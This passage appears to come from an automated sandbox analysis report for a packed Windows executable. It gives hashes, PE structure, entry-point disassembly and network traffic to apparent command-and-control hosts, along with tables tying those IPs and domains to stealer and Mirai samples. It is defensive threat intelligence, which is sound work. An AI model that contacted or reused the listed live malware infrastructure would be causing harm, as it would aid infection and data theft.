 | 7kf4hLzMoS.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
 | x6Rd1DzUJA.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
 | WCeE1A6Xyz.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
 | SzXZZDlkVE.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
 | ijn8pyFXSP.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
 | WzyLDvldFI.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
 | PhwUGyok2i.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
s-part-0035.t-0009.t-msedge.net | k6olCJyvIj.exe | malicious | LummaC | 13.107.246.63
 | BeoHXxE7q3.exe | malicious | LummaC | 13.107.246.63
 | 4KDKJjRzm8.exe | malicious | LummaC | 13.107.246.63
 | 9InQHaM8hT.exe | malicious | Stealc | 13.107.246.63
 | b0ho5YYSdo.exe | malicious | LummaC | 13.107.246.63
 | TTsfmr1RWm.exe | malicious | LummaC | 13.107.246.63
 | COBYmpzi7q.exe | malicious | LummaC | 13.107.246.63
 | rwFNJ4pHWG.exe | malicious | LummaC | 13.107.246.63
 | lBsKTx65QC.exe | malicious | LummaC | 13.107.246.63
 | HVlonDQpuI.exe | malicious | Vidar | 13.107.246.63
home.twentytk20ht.top | gDPzgKHFws.exe | malicious | Cryptbot | 185.121.15.192
 | 8kl5nJ3f9x.exe | malicious | Cryptbot | 185.121.15.192
 | 7kf4hLzMoS.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
 | SzXZZDlkVE.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
 | ijn8pyFXSP.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
 | WzyLDvldFI.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
 | PhwUGyok2i.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
 | nRYpZg6i5E.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
 | RGU8qibimk.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
 | FMuiLqyqaT.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-AESUS | xd.mips.elf | malicious | Mirai | 34.206.168.77
 | xd.x86.elf | malicious | Mirai | 44.213.56.197
 | telnet.arm.elf | malicious | Unknown | 18.209.195.84
 | telnet.sh4.elf | malicious | Unknown | 35.175.156.177
 | armv5l.elf | malicious | Mirai | 44.206.15.113
 | https://fsharetv.co/ | malicious | Unknown | 54.225.185.110
 | armv6l.elf | malicious | Mirai | 18.233.118.120
 | armv6l.elf | malicious | Unknown | 54.46.167.194
 | armv4l.elf | malicious | Unknown | 44.193.64.163
 | armv7l.elf | malicious | Unknown | 34.202.71.116
REDSERVICIOES | gDPzgKHFws.exe | malicious | Cryptbot | 185.121.15.192
 | HFoyAy1tg8.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
 | 8kl5nJ3f9x.exe | malicious | Cryptbot | 185.121.15.192
 | 7kf4hLzMoS.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
 | x6Rd1DzUJA.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
 | WCeE1A6Xyz.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
 | SzXZZDlkVE.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
 | ijn8pyFXSP.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
 | WzyLDvldFI.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
 | PhwUGyok2i.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                  Entropy (8bit):7.981218944308098
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • VXD Driver (31/22) 0.00%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:E6rBvcWFWu.exe
                                  File size:4'478'464 bytes
                                  MD5:b6bf5fb735bf9b5b70a90d2c7eeb2996
                                  SHA1:e558c73bd203dc9db3f548b9631715d281d5fc2e
                                  SHA256:cba47d50bdd548bb66bcb87510fdcc8893e53d4077fa626a0c29d83536439b6f
                                  SHA512:6640917f97a6b668d92dc8c01ebcc3eac7515d9e4fb8e8d5dc994eca7534a9b90e65264fcca869a32055c1bd4e8aa404b7b4d9519850b48eb11c4d2d577d5768
                                  SSDEEP:98304:/jTXkiWmP7OkrMWwDgmuvTeYh9qE1CK1E8fpSFoiQ94Bya8nE:/jTtPEN4R9LYh8fsc0yhE
                                  TLSH:8B2633D25D2781C2C54B323A266FDE1BED0DDDC400BFBDB6F60525785E625A8D8E3092
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@.................................x.D...@... ............................
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0x107a000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                  DLL Characteristics:DYNAMIC_BASE
                                  Time Stamp:0x67639807 [Thu Dec 19 03:50:31 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Instruction
                                  jmp 00007F577D1F852Ah
                                  sysenter
                                  inc esp
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
                                  add byte ptr [00000000h], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [esi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [edx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [ebx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [edx+ecx], al
                                  add byte ptr [eax], al
                                  pop es
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add ecx, dword ptr [edx]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add al, 00h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x72b05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x72a000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc781c0 | 0x10 | xyfieepk
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc78170 | 0x18 | xyfieepk
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no name) | 0x1000 | 0x729000 | 0x283400 | ec2089d01812922aeed6e228e947f3a9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x72a000 | 0x2b0 | 0x200 | cc3e9022702e4d1bae3a7f98f38ea941 | False | 0.79296875 | data | 6.0611403611622485 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x72b000 | 0x1000 | 0x200 | d6de82d14e357527731a70b0d9d5c0e8 | False | 0.166015625 | data | 1.1589685166080708 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no name) | 0x72c000 | 0x38e000 | 0x200 | 3c6d7df6c917d43286f739cee7e79680 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xyfieepk | 0xaba000 | 0x1bf000 | 0x1be600 | a98c26d73dd392e4fc12602be6c04129 | False | 0.9940755390646877 | data | 7.9542694260581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lpcplxjb | 0xc79000 | 0x1000 | 0x400 | 722a02f29431783fdacfa5197a6cf6a9 | False | 0.748046875 | data | 5.873978065339511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc7a000 | 0x3000 | 0x2200 | 23311e7752804fddf2c159bf687e47de | False | 0.07548253676470588 | DOS executable (COM) | 0.7625839267046199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc781d0 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 13:02:22.240403891 CET | 49719 | 443 | 192.168.2.9 | 3.218.7.103
Dec 26, 2024 13:02:22.240453005 CET | 443 | 49719 | 3.218.7.103 | 192.168.2.9
Dec 26, 2024 13:02:22.240545034 CET | 49719 | 443 | 192.168.2.9 | 3.218.7.103
Dec 26, 2024 13:02:22.335298061 CET | 49719 | 443 | 192.168.2.9 | 3.218.7.103
Dec 26, 2024 13:02:22.335328102 CET | 443 | 49719 | 3.218.7.103 | 192.168.2.9
Dec 26, 2024 13:02:24.383162975 CET | 443 | 49719 | 3.218.7.103 | 192.168.2.9
Dec 26, 2024 13:02:24.383881092 CET | 49719 | 443 | 192.168.2.9 | 3.218.7.103
Dec 26, 2024 13:02:24.383898020 CET | 443 | 49719 | 3.218.7.103 | 192.168.2.9
Dec 26, 2024 13:02:24.385270119 CET | 443 | 49719 | 3.218.7.103 | 192.168.2.9
Dec 26, 2024 13:02:24.385356903 CET | 49719 | 443 | 192.168.2.9 | 3.218.7.103
Dec 26, 2024 13:02:24.386842012 CET | 49719 | 443 | 192.168.2.9 | 3.218.7.103
Dec 26, 2024 13:02:24.386898994 CET | 443 | 49719 | 3.218.7.103 | 192.168.2.9
Dec 26, 2024 13:02:24.387115955 CET | 49719 | 443 | 192.168.2.9 | 3.218.7.103
Dec 26, 2024 13:02:24.387121916 CET | 443 | 49719 | 3.218.7.103 | 192.168.2.9
Dec 26, 2024 13:02:24.440093994 CET | 49719 | 443 | 192.168.2.9 | 3.218.7.103
Dec 26, 2024 13:02:25.043227911 CET | 443 | 49719 | 3.218.7.103 | 192.168.2.9
Dec 26, 2024 13:02:25.043346882 CET | 443 | 49719 | 3.218.7.103 | 192.168.2.9
Dec 26, 2024 13:02:25.043404102 CET | 49719 | 443 | 192.168.2.9 | 3.218.7.103
Dec 26, 2024 13:02:25.287466049 CET | 49719 | 443 | 192.168.2.9 | 3.218.7.103
Dec 26, 2024 13:02:25.287481070 CET | 443 | 49719 | 3.218.7.103 | 192.168.2.9
Dec 26, 2024 13:02:26.843492985 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:26.963135958 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:26.963238001 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:26.964468002 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.084182024 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.084203005 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.084285021 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.084377050 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.084424973 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.084465981 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.084476948 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.084485054 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.084518909 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.084542036 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.084575891 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.084587097 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.084614992 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.084625959 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.084629059 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.084677935 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.204236031 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.204343081 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.204380989 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.204432011 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.204436064 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.204468012 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.204478025 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.204485893 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.204504967 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.204525948 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.204561949 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.204612017 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.245429993 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.245565891 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.365262985 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.365365028 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.409379959 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.409475088 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.525362968 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.613387108 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.613596916 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:27.853534937 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:27.853658915 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.023005009 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.023189068 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.023282051 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.195254087 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.740654945 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.740782022 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.860305071 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.860321045 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.860532045 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.861177921 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.861187935 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.861238003 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.861258030 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.862468958 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.862478971 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.862540007 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.862660885 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.862672091 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.862720966 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.883128881 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.883140087 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.883220911 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.883223057 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.883254051 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.883269072 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.883299112 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.980273008 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.980298042 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.980380058 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.980518103 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.980528116 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.980581999 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.980583906 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.980628967 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:28.981719971 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.981729984 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.981843948 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.981858969 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.983112097 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.983124018 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.983165979 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.983278036 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.983345032 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.983355999 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.983365059 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:28.983374119 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.002978086 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.002993107 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.003137112 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.003185987 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.003288031 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.003298044 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.003536940 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.099903107 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.099919081 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.099941015 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.099957943 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.100105047 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.100116968 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.100141048 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.100183010 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.100199938 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.100248098 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.101218939 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.101231098 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.101267099 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.101284027 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.101344109 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.101389885 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.101392984 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.101448059 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.101466894 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.101495981 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.101528883 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.101612091 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.101664066 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.102603912 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.102649927 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.102655888 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.102699041 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.103207111 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.103255033 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.104513884 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.123645067 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.123714924 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.124021053 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.124070883 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.220233917 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.220282078 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.220293999 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.220299959 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.220333099 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.220346928 CET | 49730 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:29.220364094 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:29.220393896 CET | 80 | 49730 | 185.121.15.192 | 192.168.2.9
                                  Dec 26, 2024 13:02:29.220402956 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:29.220432997 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:29.220607996 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.220652103 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.220652103 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:29.220700979 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:29.220762968 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.220804930 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:29.220808029 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.220848083 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:29.221035957 CET8049730185.121.15.192192.168.2.9
